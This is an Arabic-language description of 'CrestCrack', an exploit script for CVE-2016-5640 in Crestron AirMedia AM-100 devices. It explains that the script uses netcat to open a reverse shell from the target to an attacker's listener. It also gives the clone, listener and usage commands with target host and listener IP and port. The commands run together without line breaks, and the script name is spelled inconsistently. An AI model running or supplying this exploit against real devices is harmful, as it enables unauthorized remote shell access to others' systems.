
يستغل CVE-2016-5640 / CLVA-2016-05-002 ضد Crestron AM-100
CrestCrack هو سكربت بسيط يستغل CVE-2016-5640 / CLVA-2016-05-002 داخل Crestron AirMedia AM-100 (الإصدارات v1.1.1.11 - v1.2.1). عند تمرير الوسائط له، سيستخدم CrestCrack أداة netcat لإنشاء صدفة عكسية بين هدفك ومستمع netcat من اختيارك.
git clone https://github.com/vpnguy/CrestCracknc -lvp 1337./crestcrack.py https://targethost 255.255.255.255 1337###الاستخدام: ./crescrack.py [target host] [listener IP] [listener port]
###مثال: ./crescrack.py https://targethost 123.123.123.123 3311